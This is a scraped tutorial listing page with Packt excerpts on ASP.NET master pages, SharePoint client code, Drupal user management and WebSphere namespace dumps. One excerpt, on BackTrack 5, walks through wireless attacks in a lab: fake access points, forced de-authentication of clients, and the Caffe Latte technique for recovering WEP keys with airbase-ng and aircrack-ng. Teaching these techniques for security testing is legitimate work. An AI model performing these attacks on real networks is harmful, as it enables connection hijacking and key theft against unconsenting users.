Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
All Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon
timer SALE ENDS IN
0 Days
:
00 Hours
:
00 Minutes
:
00 Seconds

How-To Tutorials - CMS & E-Commerce

830 Articles
article-image-null-3
Packt
12 Oct 2011
13 min read
Save for later

ASP.NET 3.5 CMS: Master Pages, Themes, and Menus

Packt
12 Oct 2011
13 min read
Master Pages Earlier you were introduced to a feature called Master Pages, but what exactly are they? The idea behind them is the one that's been around since the early days of development. The idea that you can inherit the layout of one page for use in another is the one that has kept many developers scrambling with Includes and User Controls. This is where Master Pages come into play. They allow you to lay out a page once and use it over and over. By doing this, you can save yourself countless hours of time, as well as being able to maintain the look and feel of your site from a single place. By implementing a Master Page and using ContentPlaceHolders, your page is able to keep its continuity throughout. You'll see on the Master Page (SimpleCMS.master) that it looks similar to a standard .aspx page from ASP.NET, but with some slight differences. The <@...> declaration has had the page identifier changed for a Master declaration. Here is a standard web page declaration: <%@ Page Language="VB" MasterPageFile="~/SimpleCMS.master"AutoEventWireup="false" CodeFile="Default.aspx.vb"Inherits="_Default" Title="Untitled Page" %> Here is the declaration for a Master Page: <%@ Master Language="VB" CodeFile="SimpleCMS.master.vb"Inherits="SimpleCMS" %> This tells the underlying ASP.NET framework how to handle this special page. If you look at the code for the page, you will also see that it inherits from System.Web.UI.MasterPage instead of the standard System.Web.UI.Page. They function similarly but, as we will cover in more detail later, they have a few distinct differences. Now, back to the Master Page. Let's take a closer look at the two existing ContentPlaceHolders. The first one you see on the page is the one with the ID of "Head". This is a default item that is added automatically to a new Master Page and its location is also standard. The system is setting up your page so that any "child" page later on will be able to put things such as Javascript and style tags into this location. It's within the HTML <head> tag, and is handled by the client's browser specially. The control's tag contains a minimal amount of properties-in reality only four, along with a basic set of events you can tie to. The reason for this is actually pretty straightforward - it doesn't need anything more. The ContentPlaceHolder controls aren't really meant to do much, from a programming standpoint. They are meant to be placeholders where other code is injected, from the child pages, and this injected code is where all the "real work" is meant to take place. With that in mind, the system acts more as a pass-through to allow the ContentPlaceHolders to have as little impact on the rest of the site as possible. Now, back to the existing page, you will see the second preloaded ContentPlaceHolder (ContentPlaceHolder1). Again, this one will be automatically added to the new Master Page when it's initially added. Its position is really more of just being "thrown on the page" when you start out. The idea is that you will position this one, as well as any others you add to the page, in such a way as to complement the design of your site. You will typically have one for every zone or region of your layout, to allow you to update the contents within. For simplicity sake, we'll keep with the one zone approach to the site, and will only use the two existing preloaded ContentPlaceHolders for now at least. The positioning of ContentPlaceHolder1 in the current layout is one where it encapsulates the main "body" for the site. All the child pages will render their content up into this section. With that, you will notice the fact that the areas outside this control are really important to the way the site will not only look but also act. Setting up your site headers (images, menus, and so on) will be of the utmost importance. Also, things such as footers, borders, and all the other pieces you will interact with on each page are typically laid out on your Master Page. In the existing example, you will also see the LoginStatus1 control placed directly on the Master Page. This is a great way to share that control and any code/events you may have tied to it, on every page, without having to duplicate your code. There are a few things to keep in mind when putting things together on your Master Page. The biggest of which is that your child/content page will inherit aspects of your Master Page. Styles, attributes, and layout are just a few of the pieces you need to keep in mind. Think of the end resulting page as more of a merger of the Master Page and child/content page. With that in mind, you can begin to understand that when you add something such as a width to the Master Page, which would be consumed by the children, the Child Page will be bound by that. For example, when many people set up their Master Page, they will often use a <table> as their defining container. This is a great way to do this and, in fact, is exactly what's done in the example we are working with. Look at the HTML for the Master Page. You will see that the whole page, in essence, is wrapped in a <table> tag and the ContentPlaceHolder is within a <td>. If you were to happen to apply a style attribute to that table and set its width, the children that fill the ContentPlaceHolder are going to be restricted to working within the confines of that predetermined size. This is not necessarily a bad thing. It will make it easier to work with the child pages in that you don't have to worry about defining their sizes-it's already done for you, and at the same time, it lets you handle all the children from this one location. It can also restrict you for those exact same reasons. You may want a more dynamic approach, and hard setting these attributes on the Master Page may not be what you are after. These are factors you need to think about before you get too far into the designing of your site. Now that you've got a basic understanding of what Master Pages are and how they can function on a simple scale, let's take a look at the way they are used from the child/content page. Look at the Default.aspx (HTML view). You will notice that this page looks distinctly different from a standard (with no Master Page) page. Here you have what a page looks like when you first add it, with no Master Page: <%@ Page Language="VB" AutoEventWireup="false"CodeFile="Default2.aspx.vb" Inherits="Default2" %><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html ><head runat="server"> <title>Untitled Page</title></head><body> <form id="form1" runat="server"> <div> </div> </form></body></html> Compare this to a new Web Form when you select a Master Page. <%@ Page Language="VB" MasterPageFile="~/SimpleCMS.master" AutoEventWireup="false" CodeFile="Default2.aspx.vb" Inherits="Default2" title="Untitled Page" %><asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server"></asp:Content><asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server"></asp:Content> You will see right away that all the common HTML tags are missing from the page with a Master Page selected. That's because all of these common pieces are being handled in the Master Page and will be rendered from the Master Page. You will also notice that the page with a Master Page also has an additional default attribute added to its page declaration. The title attribute is added so that, when merged and rendered with the Master Page, the page will get the proper title displayed. In addition to the declaration tag differences and the lack of the common HTML tags being absent, the two ContentPlaceHolder tags we defined on the Master Page are automatically referenced through the use of a Content control. These Content controls tie directly to the ContentPlaceHolder tags on the Master Page through the ContentPlaceHolderID attribute. This tells the system where to put the pieces when rendering. The basic idea is that anything between the opening and closing tags of the Content control will be rendered out to the page when being called from a browser. Themes Themes are an extension of another idea, like Master Pages, that has kept developers working long hours. How do you quickly change the look and feel of your site for different users or usages? This is where Themes come in. Themes can be thought of as a container where you store your style sheets, images, and anything else that you may want to interchange in the visual pieces of your site. Themes are folders where you put all of these pieces to group them together. While one user may be visiting your site and seeing it one way, another user can be viewing the exact same site, but get a completely different experience. Let's start off by enabling our site to include the use of Themes. To do this, right-click on the project in the Solutions Explorer, select Add ASP.NET Folder, and then choose Theme from the submenu: The folder will default to Theme1 as its name. I'd suggest that you name this something friendlier though. For now, we will call the Theme as "SimpleCMSTheme". However, later on you may want to add another Theme and give your folders descriptive names, which will really help you keep your work organized. You will see that a Theme is really nothing more than a folder for organizing all the pieces. Let's take a look at what options are available to us. Right-click on the SimpleCMSTheme folder we just created, select Add New Item, and you should see a list similar to this one: Your items may vary depending on your installation, but the key items here are Skin File and Style Sheet. You may already be familiar with stylesheets if you've done any web design work, but let's do a little refresher just in case. Stylesheets, among other uses, are a way to organize all the attributes for your HTML tags. This is really the key feature of stylesheets. You will often see them referenced and called CSS, which stands for Cascading Style Sheets that I'll explain in more detail shortly, but it's also the file extension used when adding a stylesheet to your application. Let's go ahead and add Style Sheet to our site just like the example above. For our example, we'll use the default name StyleSheet.css that the system selects. The system will preload your new stylesheet with one element-the body{} element. Let's go ahead and add a simple attribute to this element. Put your cursor between the open "{" and close "}" brackets and press Ctrl+space and you should get the IntelliSense menu. This is a list of the attributes that the system acknowledges for addition to your element tag. For our testing, let's select the background-color attribute and give it a value of Blue. It should look like this when you are completed: body {background-color: Blue;} Go ahead, save your stylesheet, run the site, and see what happens. If you didn't notice any difference, that's because even though we've now created a Theme for the site and added an attribute to the body element, we've never actually told the site to use this new Theme. Open your web.config and find the <pages…> element. It should be located in the <configuration><system.web>  section, as shown next: Go ahead, select the <pages> element, and put your cursor right after the "s". Press the spacebar and the IntelliSense menu should show up like this: You will see a long list of available items, but the item we are interested in for now is the theme. Select this and you will be prompted to enter a value. Put in the name of the Theme we created earlier. <pages theme="SimpleCMSTheme"> We've now assigned this Theme to our site with one simple line of text. Save your changes and let's run the site again and see what happens. The body element we added to our stylesheet is now read by the system and applied appropriately. View the source on your page and look at how this code was applied. The following line is now part of your rendered code: <link href="App_Themes/SimpleCMSTheme/StyleSheet.css" type="text/css" rel="stylesheet" /> Now that we've seen how to apply a Theme and how to use a stylesheet within it, let's look at one of the other key features of the Theme, the Skin file. A Skin file can be thought of as pre-setting a set of parameters for your controls in your site. This will let you configure multiple attributes, in order to give a certain look and feel to a control so that you can quickly reuse it at any time. Let's jump right in and take a look at how it works, to give you a better understanding. Right-click on the SimpleCMSTheme folder we created and select the Skin File option. Go ahead and use the defaulted name of SkinFile.skin for this example. You should get an example like this: <%--Default skin template. The following skins are provided as examples only.1. Named control skin. The SkinId should be uniquely defined becauseduplicate SkinId's per control type are not allowed in the same theme.<asp:GridView runat="server" SkinId="gridviewSkin" BackColor="White" > <AlternatingRowStyle BackColor="Blue" /></asp:GridView>2. Default skin. The SkinId is not defined. Only one defaultcontrol skin per control type is allowed in the same theme.<asp:Image runat="server" ImageUrl="~/images/image1.jpg" />--%> We now have the default Skin file for our site. Microsoft even provided a great sample here for us. What you see in the example could be translated to say that any GridView added to the site, with either no SkinID specified or with a SkinID of gridviewSkin, will use this skin. In doing so, these GridViews will all use a BackColor of White and AlternatingRowsStyle BackColor of Blue. By putting this in a Skin file as part of our Theme, we could apply these attributes, along with many others, to all like controls at one time. This can really save you a lot of development time. As we go through designing the rest of the CMS site, we will continue to revisit these Theme principles and expand the contents of them, so it is good to keep their functionality in mind as we go along.
Read more
  • 0
  • 0
  • 1186

article-image-working-client-object-model-microsoft-sharepoint
Packt
05 Oct 2011
9 min read
Save for later

Working with Client Object Model in Microsoft Sharepoint

Packt
05 Oct 2011
9 min read
Microsoft SharePoint 2010 is the best-in-class platform for content management and collaboration. With Visual Studio, developers have an end-to-end business solutions development IDE. To leverage this powerful combination of tools it is necessary to understand the different building blocks of SharePoint. In this article by Balaji Kithiganahalli, author of Microsoft SharePoint 2010 Development with Visual Studio 2010 Expert Cookbook, we will cover: Creating a list using a Client Object Model Handling exceptions Calling Object Model asynchronously (For more resources on Microsoft Sharepoint, see here.) Introduction Since out-of-the-box web services does not provide the full functionality that the server model exposes, developers always end up creating custom web services for use with client applications. But there are situations where deploying custom web services may not be feasible. For example, if your company is hosting SharePoint solutions in a cloud environment where access to the root folder is not permitted. In such cases, developing client applications with new Client Object Model (OM) will become a very attractive proposition. SharePoint exposes three OMs which are as follows: Managed Silverlight JavaScript (ECMAScript) Each of these OMs provide object interface to functionality exposed in Microsoft. SharePoint namespace. While none of the object models expose the full functionality that the server-side object exposes, the understanding of server Object Models will easily translate for a developer to develop applications using an OM. A managed OM is used to develop custom .NET managed applications (service, WPF, or console applications). You can also use the OM for ASP.NET applications that are not running in the SharePoint context as well. A Silverlight OM is used by Silverlight client applications. A JavaScript OM is only available to applications that are hosted inside the SharePoint applications like web part pages or application pages. Even though each of the OMs provide different programming interfaces to build applications, behind the scenes, they all call a service called Client.svc to talk to SharePoint. This Client.svc file resides in the ISAPI folder. The service calls are wrapped around with an Object Model that developers can use to make calls to SharePoint server. This way, developers make calls to an OM and the calls are all batched together in XML format to send it to the server. The response is always received in JSON format which is then parsed and associated with the right objects. The basic architectural representation of the client interaction with the SharePoint server is as shown in the following image: The three Object Models come in separate assemblies. The following table provides the locations and names of the assemblies: Object OM Location Names Managed ISAPI folder Microsoft.SharePoint.Client.dll Microsoft.SharePoint.Client.Runtime.dll Silverlight LayoutsClientBin Microsoft.SharePoint.Client. Silverlight.dll Microsoft.SharePoint.Client. Silverlight.Runtime.dll JavaScript Layouts SP.js The Client Object Model can be downloaded as a redistributable package from the Microsoft download center at:http://www.microsoft.com/downloads/en/details.aspx?FamilyID=b4579045-b183-4ed4-bf61-dc2f0deabe47 OM functionality focuses on objects at the site collection and below. The main reason being that it will be used to enhance the end-user interaction. Hence the OM is a smaller subset of what is available through the server Object Model. In all three Object Models, main object names are kept the same, and hence the knowledge from one OM is easily portable to another. As indicated earlier, knowledge of server Object Models easily transfer development using client OM The following table shows some of the major objects in the OM and their equivalent names in the server OM: Client OM Server OM ClientContext SPContext Site SPSite Web SPWeb List SPList ListItem SPListItem Field SPField Creating a list using a Managed OM In this recipe, we will learn how to create a list using a Managed Object Model. We will also add a new column to the list and insert about 10 rows of data to the list. For this recipe, we will create a console application that makes use of a generic list template. Getting ready You can copy the DLLs mentioned earlier to your development machine. Your development machine need not have the SharePoint server installed. But you should be able to access one with proper permission. You also need Visual Studio 2010 IDE installed on the development machine. How to do it… In order to create a list using a Managed OM, adhere to the following steps: Launch your Visual Studio 2010 IDE as an administrator (right-click the shortcut and select Run as administrator). Select File | New | Project . The new project wizard dialog box will be displayed (make sure to select .NET Framework 3.5 in the top drop-down box). Select Windows Console application under the Visual C# | Windows | Console Application node from Installed Templates section on the left-hand side. Name the project OMClientApplication and provide a directory location where you want to save the project and click on OK to create the console application template. To add a references to Microsoft.SharePoint.Client.dll and Microsoft.SharePoint.Client.Runtime.dll, go to the menu Project | Add Reference and navigate to the location where you copied the DLLs and select them as shown In the following screenshot: Now add the code necessary to create a list. A description field will also be added to our list. Your code should look like the following (make sure to change the URL passed to the ClientContext constructor to your environment): using Microsoft.SharePoint.Client;namespace OMClientApplication{ class Program { static void Main(string[] args) { using (ClientContext clientCtx = new ClientContext("http://intsp1")) { Web site = clientCtx.Web; // Create a list. ListCreationInformation listCreationInfo = new ListCreationInformation(); listCreationInfo.Title = "OM Client Application List"; listCreationInfo.TemplateType = (int)ListTemplateType.GenericList; listCreationInfo.QuickLaunchOption = QuickLaunchOptions.On; List list = site.Lists.Add(listCreationInfo); string DescriptionFieldSchema = "<Field Type='Note' DisplayName='Item Description' Name='Description' Required='True' MaxLength='500' NumLines='10' />"; list.Fields.AddFieldAsXml(DescriptionFieldSchema, true, AddFieldOptions.AddToDefaultContentType);// Insert 10 rows of data - Concat loop Id with "Item Number" string. for (int i = 1; i < 11; ++i) { ListItemCreationInformation listItemCreationInfo = new ListItemCreationInformation(); ListItem li = list.AddItem(listItemCreationInfo); li["Title"] = string.Format("Item number {0}",i); li["Item_x0020_Description"] = string.Format("Item number {0} from client Object Model", i); li.Update(); } clientCtx.ExecuteQuery(); Console.WriteLine("List creation completed"); Console.Read(); } } }} Build and execute the solution by pressing F5 or from the menu Debug | Start Debugging . This should bring up the command window with a message indicating that the List creation completed as shown in the following screenshot. Press Enter and close the command window. Navigate to your site to verify that the list has been created. The following screenshot shows the list with the new field and ten items inserted: (Move the mouse over the image to enlarge.) How it works... The first line of the code in the Main method is to create an instance of ClientContext class. The ClientContext instance provides information about the SharePoint server context in which we will be working. This is also the proxy for the server we will be working with. We passed the URL information to the context to get the entry point to that location. When you have access to the context instance, you can browse the site, web, and list objects of that location. You can access all the properties like Name , Title , Description , and so on. The ClientContext class implements the IDisposable interface, and hence you need to use the using statement. Without that you have to explicitly dispose the object. If you do not do so, your application will have memory leaks. For more information on disposing objects refer to MSDN at:http://msdn.microsoft.com/en-us/library/ee557362.aspx From the context we were able to obtain access to our site object on which we wanted to create the list. We provided list properties for our new list through the ListCreationInformation instance. Through the instance of ListCreationInformation, we set the values to list properties like name, the templates we want to use, whether the list should be shown in the quick launch bar or not, and so on. We added a new field to the field collection of the list by providing the field schema. Each of the ListItems are created by providing ListItemCreationInformation. The ListItemCreationInformation is similar to ListCreationInformation where you would provide information regarding the list item like whether it belongs to a document library or not, and so on. For more information on ListCreationInformation and ListItemCreationInformation members refer to MSDN at:http://msdn.microsoft.com/en-us/library/ee536774.aspx. All of this information is structured as an XML and batched together to send it to the server. In our case, we created a list and added a new field and about ten list items. Each of these would have an equivalent server-side call, and hence, all these multiple calls were batched together to send it to the server. The request is only sent to the server when we issue an ExecuteQuery or ExecuteQueryAsync method in the client context. The ExecuteQuery method creates an XML request and passes that to Client.svc. The application waits until the batch process on the server is completed and then returns back with the JSON response. Client.svc makes the server Object Model call to execute our request. There's more... By default, ClientContext instance uses windows authentication. It makes use of the windows identity of the person executing the application. Hence, the person running the application should have proper authorization on the site to execute the commands. Exceptions will be thrown if proper permissions are not available for the user executing the application. We will learn about handling exceptions in the next recipe. It also supports Anonymous and FBA (ASP.Net form based authentication) authentication. The following is the code for passing FBA credentials if your site supports it: using (ClientContext clientCtx = new ClientContext("http://intsp1")){clientCtx.AuthenticationMode = ClientAuthenticationMode.FormsAuthentication;FormsAuthenticationLoginInfo fba = new FormsAuthenticationLoginInfo("username", "password");clientCtx.FormsAuthenticationLoginInfo = fba;//Business Logic} Impersonation In order to impersonate you can pass in credential information to the ClientContext as shown in the following code: clientCtx.Credentials = new NetworkCredential("username", "password", "domainname"); Passing credential information this way is supported only in Managed OM.  
Read more
  • 0
  • 0
  • 6028

article-image-backtrack-5-attacking-client
Packt
28 Sep 2011
7 min read
Save for later

BackTrack 5: Attacking the Client

Packt
28 Sep 2011
7 min read
  (For more resources on BackTrack, see here.) Honeypot and Mis-Association attacks Normally, when a wireless client such as a laptop is turned on, it will probe for the networks it has previously connected to. These networks are stored in a list called the Preferred Network List (PNL) on Windows-based systems. Also, along with this list, it will display any networks available in its range. A hacker may do either of two things: Silently monitor the probe and bring up a fake access point with the same ESSID the client is searching for. This will cause the client to connect to the hacker machine, thinking it is the legitimate network. He may create fake access points with the same ESSID as neighboring ones to confuse the user to connect to him. Such attacks are very easy to conduct in coffee shops and airports where a user might be looking to connect to a Wi-Fi connection. These attacks are called Honeypot attacks, which happen due to Mis-Association to the hacker's access point thinking it is the legitimate one. In the next exercise, we will do both these attacks in our lab. Time for action – orchestrating a Mis-Association attack Follow these instructions to get started: In the previous labs, we used a client that had connected to the Wireless Lab access point. Let us switch on the client but not the actual Wireless Lab access point. Let us now run airodump-ng mon0 and check the output. You will very soon find the client to be in not associated mode and probing for Wireless Lab and other SSIDs in its stored profile (Vivek as shown): (Move the mouse over the image to enlarge.) To understand what is happening, let's run Wireshark and start sniffing on the mon0 interface. As expected you might see a lot of packets, which are not relevant to our analysis. Apply a Wireshark filter to only display Probe Request packets from the client MAC you are using: In my case, the filter would be wlan.fc.type_subtype == 0x04 && wlan.sa == 60:FB:42:D5:E4:01. You should now see Probe Request packets only from the client for the SSIDs Vivek and Wireless Lab: Let us now start a fake access point for the network Wireless Lab on the hacker machine using the command shown next: Within a minute or so, the client would connect to us automatically. This shows how easy it is to have un-associated clients. Now, we will try the second case, which is creating a fake access point Wireless Lab in the presence of the legitimate one. Let us turn our access point on to ensure that Wireless Lab is available to the client. For this experiment, we have set the access point channel to 3. Let the client connect to the access point. We can verify this from the airodump-ng screen as shown next: Now let us bring up our fake access point with the SSID Wireless Lab: Notice the client is still connected to the legitimate access point Wireless Lab: We will now send broadcast De-Authentication messages to the client on behalf of the legitimate access point to break their connection: Assuming the signal strength of our fake access point Wireless Lab is stronger than the legitimate one to the client, it connects to our fake access point, instead of the legitimate access point: We can verify the same by looking at the airodump-ng output to see the new association of the client with our fake access point: What just happened? We just created a Honeypot using the probed list from the client and also using the same ESSID as that of neighboring access points. In the first case, the client automatically connected to us as it was searching for the network. In the latter case, as we were closer to the client than the real access point, our signal strength was higher, and the client connected to us. Have a go hero – forcing a client to connect to the Honeypot In the preceding exercise, what do we do if the client does not automatically connect to us? We would have to send a De-Authentication packet to break the legitimate client-access point connection and then if our signal strength is higher, the client will connect to our spoofed access point. Try this out by connecting a client to a legitimate access point, and then forcing it to connect to our Honeypot. Caffe Latte attack In the Honeypot attack, we noticed that clients will continuously probe for SSIDs they have connected to previously. If the client had connected to an access point using WEP, operating systems such as Windows, cache and store the WEP key. The next time the client connects to the same access point, the Windows wireless configuration manager automatically uses the stored key. The Caffe Latte attack was invented by me, the author of this book and was demonstrated in Toorcon 9, San Diego, USA. The Caffe Latte attack is a WEP attack which allows a hacker to retrieve the WEP key of the authorized network, using just the client. The attack does not require the client to be anywhere close to the authorized WEP network. It can crack the WEP key using just the isolated client. In the next exercise, we will retreive the WEP key of a network from a client using the Caffe Latte attack. Time for action – conducting the Caffe Latte attack Follow these instructions to get started: Let us first set up our legitimate access point with WEP for the network Wireless Lab with the key ABCDEFABCDEFABCDEF12 in Hex: Let us connect our client to it and ensure that the connection is successful using airodump-ng as shown next: Let us unplug the access point and ensure the client is in the un-associated stage and searching for the WEP network Wireless Lab: Now we use airbase-ng to bring up an access point with Wireless Lab as the SSID with the parameters shown next: As soon as the client connects to this access point, airbase-ng starts the Caffe- Latte attack as shown: We now start airodump-ng to collect the data packets from this access point only, as we did before in the WEP-cracking case: We also start aircrack-ng as in the WEP-cracking exercise we did before to begin the cracking process. The command line would be aircrack-ng filename where filename is the name of the file created by airodump-ng: Once we have enough WEP encrypted packets, aircrack-ng succeeds in cracking the key as shown next: What just happened? We were successful in retrieving the WEP key from just the wireless client without requiring an actual access point to be used or present in the vicinity. This is the power of the Caffe Latte attack. The attack works by bit flipping and replaying ARP packets sent by the wireless client post association with the fake access point created by us. These bit flipped ARP Request packets cause more ARP response packets to be sent by the wireless client. Note that all these packets are encrypted using the WEP key stored on the client. Once we are able to gather a large number of these data packets, aircrack-ng is able to recover the WEP key easily. Have a go hero – practice makes you perfect! Try changing the WEP key and repeat the attack. This is a difficult attack and requires some practice to orchestrate successfully. It would also be a good idea to use Wireshark and examine the traffic on the wireless network.
Read more
  • 0
  • 0
  • 3243
Visually different images

article-image-drupal-7-social-networking-managing-users-and-profiles
Packt
27 Sep 2011
9 min read
Save for later

Drupal 7 Social Networking: Managing Users and Profiles

Packt
27 Sep 2011
9 min read
  (For more resources on Drupal, see here.) What are we going to do and why? Before we get started, let's take a closer look at what we are going to do in this article and why. At the moment, our users can interact with the website and contribute content, including through their own personal blog. Apart from the blog, there isn't a great deal which differentiates our users; they are simply a username with a blog! One key improvement to make now is to make provisions for customizable user profiles. Our site being a social network with a dinosaur theme, the following would be useful information to have on our users: Details of their pet dinosaurs, including: Name Breed Date of birth Hobbies Their details for other social networking sites; for example, links to their Facebook profile, Twitter account, or LinkedIn page Location of the user (city / area) Their web address (if they have their own website) Some of these can be added to user profiles by adding new fields to profiles, using the built in Field API; however we will also install some additional modules to extend the default offering. Many websites allow users to upload an to associate with their user account, either a photograph or an avatar to represent them. Drupal has provisions for this, but it has some drawbacks which can be fixed using Gravatar. Gravatar is a social avatar service through which users upload their avatar, which is then accessed by other websites that request the avatar using the user's e-mail address. This is convenient for our users, as it saves them having to upload their avatars to our site, and reduces the amount of data stored on our site, as well as the amount of data being transferred to and from our site. Since not all users will want to use a third-party service for their avatars (particularly, users who are not already signed up to Gravatar) we can let them upload their own avatars if they wish, through the Upload module. There are many other social networking sites out there, which don't complete with ours, and are more generalized, as a result we might want to allow our users to promote their profiles for other social networks too. We can download and install the Follow module which will allow users to publicize their profiles for other social networking sites on their profile on our site. Once our users get to know each other more, they may become more interested in each other's posts and topics and may wish to look up a specific user's contribution to the site. The tracker module allows users to track one another's contributions to the site. It is a core module, which just needs to be enabled and set up. Now that we have a better idea of what we are going to do in this , let's get started! Getting set up As this article covers features provided by both core modules and contributed modules (which need to be downloaded first), let's download and enable the modules first, saving us the need for continually downloading and enabling modules throughout the article. The modules which we will require are: Tracker (core module) Gravatar (can be downloaded from: http://drupal.org/project/gravatar) Follow (can be downloaded from: http://drupal.org/project/follow) Field_collection (can be downloaded from:http://drupal.org/project/field_collection) Entity (can be downloaded from:http://drupal.org/project/entity ) Trigger module (core module) These modules can be downloaded and then the contents extracted to the /sites/all/modules folder within our Drupal installation. Once extracted they will then be ready to be enabled within the Modules section of our admin area. Users, roles, and permissions Let's take a detailed look at users, roles, and permissions and how they all fit together. Users, roles, and permissions are all managed from the People section of the administration area: User management Within the People section, users are listed by default on the main screen. These are user accounts which are either created by us, as administrators, or created when a visitor to our site signs up for a user account. From here we can search for particular types of users, create new users, and edit users—including updating their profiles, suspending their account, or delete them permanently from our social network. Once our site starts to gain popularity it will become more difficult for us to navigate through the user list. Thankfully there are search, sort, and filter features available to make this easier for us. Let's start by taking a look at our user list: (Move the mouse over the image to enlarge.) This user list shows, for each user: Their username If their user account is active or blocked (their status) The roles which are associated with their account How long they have been a member of our community When they last accessed our site A link to edit the user's account Users: Viewing, searching, sorting, and filtering Clicking on a username will take us to the profile of that particular user, allowing us to view their profile as normal. Clicking one of the headings in the user list allows us to sort the list from the field we selected: This could be particularly useful to see who our latest members are, or to allow us to see which users are blocked, if we need to reactivate a particular account. We can also filter the user list based on a particular role that is assigned to a user, a particular permission they have (by virtue of their roles), or by their status (if their account is active or blocked). This is managed from the SHOW ONLY USERS WHERE panel: Creating a user Within the People area, there is a link Add user, which will allow us to create a new user account for our site: This takes us to the new user page where we are required to fill out the Username, E-mail address, and Password (twice to confirm) for the new user account we wish to create. We can also select the status of the user (Active or Blocked), any roles we wish to apply to their account, and indicate if we want to automatically e-mail the user to notify them of their new account: Editing a user To edit a user account we simply need to click the edit link displayed next to the user in the user list. This takes us to a page similar to the create user screen, except that it is pre-populated with the users details. It also contains a few other settings related to some default installed modules. As we install new modules, the page may include more options. Inform the user! If you are planning to change a user's username, password, or e-mail address you should notify them of the change, otherwise they may struggle the next time they try to log in! Suspending / blocking a user If we need to block or suspend a user, we can do this from the edit screen by updating their status to Blocked: This would prevent the user from accessing our site. For example, if a user had been posting inappropriate material, even after a number of warnings, we could block their account to prevent them from accessing the site. Why block? Why not just delete? If we were to simply delete a user who was troublesome on the site, they could simply sign up again (unless we went to a separate area and also blocked their e-mail address and username). Of course, the user could still sign up again using a different e-mail address and a different username, but this helps us keep things under control. Canceling and deleting a user account Also within the edit screen is the option to cancel a user's account: On clicking the Cancel account button, we are given a number of options for how we wish to cancel the account: The first and third options will at least keep the context of any discussions or contributions to which the user was involved with. The second option will unpublish their content, so if for example comments or pages are removed which have an impact on the community, we can at least re-enable them. The final option will delete the account and all content associated with it. Finally, we can also select if the user themselves must confirm that they wish to have their account deleted. Particularly useful if this is in response to a request from the user to delete all of their data, they can be given a final chance to change their mind. Bulk user operations For occasions when we need to perform specific operations to a range of user accounts (for example, unblocking a number of users, or adding / removing roles from specific users) we can use the Update options panel, in the user list to do these: From here we simply select the users we want to apply an action to, and then select one of the following options from the UPDATE OPTIONS list: Unblock the selected users Block the selected users Cancel the selected user accounts Add a role to the selected users Remove a role from the selected users Roles Users are grouped into a number of roles, which in turn have permissions assigned to them. By default there are three roles within Drupal: Administrators Anonymous users Authenticated users The anonymous and authenticated roles can be edited but they cannot be renamed or deleted. We can manage user roles by navigating to People | Permissions | Roles: The edit permissions link allows us to edit the permissions associated with a specific role. To create a new role, we simply need to enter the name for the role in the text box provided and click the Add role button.  
Read more
  • 0
  • 0
  • 4258

article-image-ibm-websphere-application-server-administration-tools
Packt
23 Sep 2011
9 min read
Save for later

IBM WebSphere Application Server: Administration Tools

Packt
23 Sep 2011
9 min read
  (For more resources on IBM, see here.) Dumping namespaces To diagnose a problem, you might need to collect WAS JNDI information. WebSphere Application Server provides a utility that dumps the JNDI namespace. The dumpNamespace.sh script dumps information about the WAS namespace and is very useful when debugging applications when JNDI errors are seen in WAS logs. You can use this utility to dump the namespace to see the JNDI tree that the WAS name server (WAS JNDI lookup service provider) is providing for applications. This tool is very useful in JNDI problem determination, for example, when debugging incorrect JNDI resource mappings in the case where an application resource is not mapped correctly to a WAS-configured resource or the application is using direct JNDI lookups when really it should be using indirect lookups. For this tool to work, WAS must be running when this utility is run. To run the utility, use the following syntax: ./dumpNameSpace.sh -<command_option> There are many options for this tool and the following table lists the command-line options available by typing the command <was_root>/dumpsnameSpace.sh -help: Command option Description -host <host> Bootstrap host, that is, the WebSphere host whose namespace you want to dump. Defaults to localhost. -port <port> Bootstrap port. Defaults to 2809. -user <name> Username for authentication if security is enabled on the server. Acts the same way as the -username keyword. -username <name> Username for authentication if security is enabled on the server. Acts the same way as the -user keyword. -password <password> Password for authentication, if security is enabled in the server. -factory <factory> The initial context factory to be used to get the JNDI initial context. Defaults to com.ibm.websphere.naming. WsnInitialContextFactory and normally does not need to be changed. -root [ cell | server | node | host | legacy | tree | default ] Scope of the namespace to dump. For WS 5.0 or later: cell: DumpNameSpace default. Dump the tree starting at the cell root context. server: Dump the tree starting at the server root context. node: Dump the tree starting at the node root context. (Synonymous with host) For WS 4.0 or later: legacy: DumpNameSpace default. Dump the tree starting at the legacy root context. host: Dump the tree starting at the bootstrap host root context. (Synonymous with node) tree: Dump the tree starting at the tree root context. For all WebSphere and other name servers: default: Dump the tree starting at the initial context, which JNDI returns by default for that server type. This is the only -root choice that is compatible with WebSphere servers prior to 4.0 and with non-WebSphere name servers. The WebSphere initial JNDI context factory (default) obtains the desired root by specifying a key specific to the server type when requesting an initial CosNaming NamingContext reference. The default roots and the corresponding keys used for the various server types are listed as follows: WebSphere 5.0: Server root context. This is the initial reference registered under the key of NameServiceServerRoot on the server. WebSphere 4.0: Legacy root context. This context is bound under the name domain/legacyRoot, in the initial context registered on the server, under the key NameService. WebSphere 3.5: Initial reference registered under the key of NameService, on the server. Non-WebSphere: Initial reference registered under the key of NameService, on the server. -url <url> The value for the java.naming.provider.url property used to get the initial JNDI context. This option can be used in place of the -host, -port, and -root options. If the -url option is specified, the -host,-port, and -root options are ignored. -startAt <some/subcontext/ in/the/tree> The path from the requested root context to the top-level context, where the dump should begin. Recursively dumps (displays a tree-like structure) the sub-contexts of each namespace context. Defaults to empty string, that is, root context requested with the -root option. -format [ jndi | ins ] jndi: Display name components as atomic strings. ins: Display name components parsed per INS rules (id.kind) The default format is jndi. -report [ short | long ] short: Dumps the binding name and bound object type, which is essentially what JNDI Context. list() provides. long: Dumps the binding name, bound object type, local object type, and string representation of the local object, that is, Interoperable Object References (IORs) string values, and so on, are printed). The default report option is short. -traceString <some.package. to.trace.*=all> Trace string of the same format used with servers, with output going to the DumpNameSpaceTrace.out file. Example name space dump To see the result of using the namespace tool, navigate to the <was_root>/bin directory on your Linux server and type the following command: For Linux: ./dumpNameSpace.sh -root cell -report short -username wasadmin -password wasadmin >> /tmp/jnditree.txt 